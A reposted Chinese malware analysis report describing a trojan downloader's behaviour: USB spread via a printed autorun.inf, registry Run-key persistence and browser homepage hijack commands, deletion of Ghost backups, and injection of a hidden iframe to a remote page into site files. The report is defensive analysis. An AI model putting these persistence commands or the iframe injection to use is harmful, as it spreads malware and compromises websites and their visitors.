分析报告：下载者生成器生成的网页木马

• 这年头，做个守法公民真不容易，昨天有个曾经做过“黑客”的朋友做的网站被DDoS了，他打算重操旧业。为非作歹的程序员也层出不穷，下面这个是昨天那个牛×下载者生成器生成的网马分析报告。那个下载器本身毒霸也可以杀。

  又到大学生找工作的时候了，不晓得会有多少学生因就业问题，走到病毒开发者的队伍中去。

  这是一个木马下载病毒，该病毒会删除被感染机器上的Ghost备份文件，并且尝试感染脚本文件，尝试通过U盘传播把病毒本身传播出去。链接指定网址，下载其他木马程序。

  1.%system%\SVSH0ST.EXE
  %system%\Autorun.inf

  1.病毒把本身拷贝到每个盘符下面并且命名为来lcg.exe，并且创建autorun.inf文件，内容如下：

  [AutoRun]
  
  open=lcg.exe
  shell\open=打开(&O)
  shell\open\Command=lcg.exe
  shell\open\Default=1
  shell\eXPlore=资源管理器(&X)
  shell\explore\Command=lcg.EXE

  2.创建互斥量"niux"

  3.运行创建进程运行下面的命令：

  reg.exe
  "ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V svchost /T REG_SZ /D "
  "ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V svchost /T REG_SZ /D 
  C:\\WINNT\\System32\\SVSH0ST.EXE /F"
  "add \"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\" /v \"Start Page\" /t 
  REG_EXPAND_SZ /d /f"
  "add \"HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\" /v 
  \"HomePage\" /t REG_DWord /d 00000001 /f"

  4.枚举所有当前窗口，如果发现窗口信息中含有以下字符，就关闭该窗口：

  "病毒"

  5.遍历所有的盘符，如果文件后缀名为.GHO文件(ghost备份文件)，则删除该文件，如果文件名中含有以下的

  INDEX.ASP
  .HTM
  INDEX.PHP
  DEFAULT.ASP
  DEFAULT.PHP
  CONN.ASP

  
  之一的责尝试在文件末尾插入代码：

  <ｉｆｒａｍｅ src=http://*/test.htm width=0 height=0><　/　ｉｆｒａｍｅ　>

  （出处：网侠）

• 复制本页网址和标题，发送给你QQ/Msn的好友一起分享
  
  
• 分析报告：下载者生成器生成的网页木马 相关文章：
• ·vista分区软件
• ·关于三级片和Ａ片的区分标准
• ·校园网网络方案设计及分析
• ·计算机一级B考试试题分析
• ·Linux操作系统源代码详细分析
• ·主板各部分图解
• ·联讯证券同花顺软件分析系统使用
• ·求职面试自我介绍一分钟
• ·装VISTA的分区要多大?
• ·一个Struts实现分页,增删改查,Tiles,国际化的DEMO
• 分析报告：下载者生成器生成的网页木马 相关软件
• ·视频分割专家 V5.83
• ·龙卷风基金投资分析系统
• ·蓝光影音Mp3分割器 V1.60
• ·同花顺证券行情分析软件(同花顺)2007 V4.40.12
• ·大福星行情分析系统 V1.52
• ·大智慧level2行情分析系统 V2.1
• ·大智慧新一代高速行情分析系统(Internet) V2.05.07.0208
• ·木马分析专家2007V9.49 Build 1226
• ·五分之庭
• ·科来网络分析系统 V6.5

上一篇:WIN2000下Apache2和Tomcat5的整合配置

下一篇:由江民到Adobe Reader卡巴斯基频繁误报

• 特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作
• 者.文章版权归文章原始作者所有.对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转
• 载的文章有版权问题请联系编辑人员,我们尽快予以更正. 转载请注明来源：http://www.hackhome.com

精品推荐

热点TOP10

特别推荐